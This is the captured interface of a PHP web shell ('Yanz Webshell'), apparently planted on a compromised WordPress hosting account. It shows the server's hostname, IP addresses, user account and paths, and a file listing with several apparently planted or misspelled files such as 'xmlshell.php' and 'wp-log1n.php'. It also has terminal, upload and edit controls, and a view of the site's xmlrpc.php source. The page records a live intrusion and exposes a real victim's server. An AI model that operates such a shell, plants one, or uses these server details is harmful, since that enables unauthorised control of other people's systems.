Attention:
Uname:
Php:
Hdd:
Cwd:

Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-14 10:02:32
2792.60 GB Free: 1880.62 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.89

[ Files ]	[ Logout ]

File manager

	Name	Size	Modify	Permissions	Actions
	[ . ]	dir	2025-11-28 13:13:32	dr-xr-xr-x	Rename Touch
	[ .. ]	dir	2025-12-11 23:22:37	drwx--x--x	Rename Touch
	[ .tmb ]	dir	2025-11-12 07:07:40	drwxrwxrwx	Rename Touch
	[ .well-known ]	dir	2025-11-12 07:07:35	drwxr-xr-x	Rename Touch
	[ 117cb ]	dir	2025-11-14 05:53:05	dr-xr-xr-x	Rename Touch
	[ 1d8b10 ]	dir	2025-11-14 08:28:52	drwxr-xr-x	Rename Touch
	[ cgi-bin ]	dir	2025-11-14 05:52:56	drwxr-xr-x	Rename Touch
	[ f4727b ]	dir	2025-11-19 07:48:55	drwxr-xr-x	Rename Touch
	[ images ]	dir	2025-11-14 05:52:56	drwxr-xr-x	Rename Touch
	[ wp-admin ]	dir	2025-11-26 03:07:13	drwxr-xr-x	Rename Touch
	[ wp-content ]	dir	2025-11-22 08:16:38	drwxr-xr-x	Rename Touch
	[ wp-includes ]	dir	2025-11-22 08:16:25	drwxr-xr-x	Rename Touch
	.htaccess	1.13 KB	2025-11-28 13:17:43	-r-xr-xr-x	Rename Touch Edit Download
	.htaccess.phpupgrader.57402773	1.31 KB	2022-05-09 06:47:34	-rw-r--r--	Rename Touch Edit Download
	.htaccess.phpupgrader.9e97ffcf	1.45 KB	2023-08-02 18:50:37	-rw-r--r--	Rename Touch Edit Download
	.htaccess.phpupgrader.initial	1.31 KB	2022-05-09 06:47:34	-rw-r--r--	Rename Touch Edit Download
	click.php	1.93 KB	2023-09-14 08:16:25	-r--r--r--	Rename Touch Edit Download
	defaults.php	1.93 KB	2023-07-21 03:50:14	-r--r--r--	Rename Touch Edit Download
	ex.php	5.96 KB	2025-11-28 13:13:32	-rw-r--r--	Rename Touch Edit Download
	header.php	0 B	2025-11-10 06:52:51	-rw-r--r--	Rename Touch Edit Download
	index.php	35.97 KB	2023-05-29 08:16:38	-r-xr-xr-x	Rename Touch Edit Download
	index.php0	35.97 KB	2023-09-11 08:16:37	-rwxr-xr-x	Rename Touch Edit Download
	item.php	1.29 KB	2023-08-18 08:15:39	-r--r--r--	Rename Touch Edit Download
	license.txt	19.44 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	mah.php	1.93 KB	2023-12-31 03:48:47	-r--r--r--	Rename Touch Edit Download
	networks.php	1.29 KB	2024-01-13 03:43:18	-r--r--r--	Rename Touch Edit Download
	options.php	1.93 KB	2023-12-03 08:16:25	-r--r--r--	Rename Touch Edit Download
	pages.php	1.44 KB	2023-07-28 08:15:18	-r--r--r--	Rename Touch Edit Download
	php.ini	40 B	2025-11-18 19:54:41	-rw-r--r--	Rename Touch Edit Download
	plugins.php	1.87 KB	2023-07-01 08:16:25	-r--r--r--	Rename Touch Edit Download
	product.php	2.03 KB	2023-04-16 03:50:14	-r--r--r--	Rename Touch Edit Download
	quoys.php	26.20 KB	2025-11-13 01:08:41	-rw-r--r--	Rename Touch Edit Download
	readme.html	7.25 KB	2025-09-30 22:02:04	-rw-r--r--	Rename Touch Edit Download
	robots.txt	364 B	2023-06-15 08:16:38	-r--r--r--	Rename Touch Edit Download
	search.php	1.46 KB	2023-12-19 08:16:38	-r--r--r--	Rename Touch Edit Download
	track.php	6.49 KB	2025-11-12 04:05:52	-rw-r--r--	Rename Touch Edit Download
	txets.php	5.89 KB	2025-11-12 06:13:57	-rw-r--r--	Rename Touch Edit Download
	wp-activate.php	7.21 KB	2024-04-02 19:31:34	-rw-r--r--	Rename Touch Edit Download
	wp-blog-header.php	347 B	2025-11-10 06:52:59	-rw-r--r--	Rename Touch Edit Download
	wp-comments-post.php	2.27 KB	2023-08-09 07:36:19	-rw-r--r--	Rename Touch Edit Download
	wp-config-sample.php	3.26 KB	2024-11-13 07:16:19	-rw-r--r--	Rename Touch Edit Download
	wp-config.php	3.12 KB	2022-02-15 07:01:10	-rw-------	Rename Touch Edit Download
	wp-confiq.php	0 B	2025-11-10 06:52:50	-rw-r--r--	Rename Touch Edit Download
	wp-cron.php	5.51 KB	2025-11-10 06:53:00	-rw-r--r--	Rename Touch Edit Download
	wp-load.php	3.84 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-log1n.php	1.72 KB	2024-01-28 08:14:59	-r--r--r--	Rename Touch Edit Download
	wp-mail.php	8.52 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-settings.php	29.38 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-signup.php	33.71 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-trackback.php	4.98 KB	2024-11-13 07:16:19	-rw-r--r--	Rename Touch Edit Download
	xmlrpc.php	3.13 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	xmlshell.php	243.86 KB	2025-11-13 16:26:34	-rw-r--r--	Rename Touch Edit Download

Change dir:	Read file:
Make dir: (Not writable)	Make file: (Not writable)
Terminal:	Upload file: (Not writable)

HEX

HEX

Server: Apache

System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64

User: kheruwym (1551)

PHP: 8.1.33

Disabled: exec,passthru,shell_exec,system

Upload Files

File: /home/kheruwym/public_html/xmlrpc.php

<?php
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */

/**
 * Whether this is an XML-RPC Request.
 *
 * @var bool
 */
define( 'XMLRPC_REQUEST', true );

// Discard unneeded cookies sent by some browser-embedded clients.
$_COOKIE = array();

// $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0.
// phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved
if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
	$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}

// Fix for mozBlog and other cases where '<?xml' isn't on the very first line.
$HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA );
// phpcs:enable

/** Include the bootstrap for setting up WordPress environment */
require_once __DIR__ . '/wp-load.php';

if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html
	header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
	echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
	?>
<rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
	<service>
		<engineName>WordPress</engineName>
		<engineLink>https://wordpress.org/</engineLink>
		<homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink>
		<apis>
			<api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<?php
			/**
			 * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint.
			 *
			 * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html
			 *
			 * @since 3.5.0
			 */
			do_action( 'xmlrpc_rsd_apis' );
			?>
		</apis>
	</service>
</rsd>
	<?php
	exit;
}

require_once ABSPATH . 'wp-admin/includes/admin.php';
require_once ABSPATH . WPINC . '/class-IXR.php';
require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php';

/**
 * Posts submitted via the XML-RPC interface get that title
 *
 * @name post_default_title
 * @var string
 */
$post_default_title = '';

/**
 * Filters the class used for handling XML-RPC requests.
 *
 * @since 3.1.0
 *
 * @param string $class The name of the XML-RPC server class.
 */
$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' );
$wp_xmlrpc_server       = new $wp_xmlrpc_server_class();

// Fire off the request.
$wp_xmlrpc_server->serve_request();

exit;

/**
 * logIO() - Writes logging info to a file.
 *
 * @since 1.2.0
 * @deprecated 3.4.0 Use error_log()
 * @see error_log()
 *
 * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging.
 *
 * @param string $io  Whether input or output.
 * @param string $msg Information describing logging reason.
 */
function logIO( $io, $msg ) {
	_deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' );
	if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) {
		error_log( $io . ' - ' . $msg );
	}
}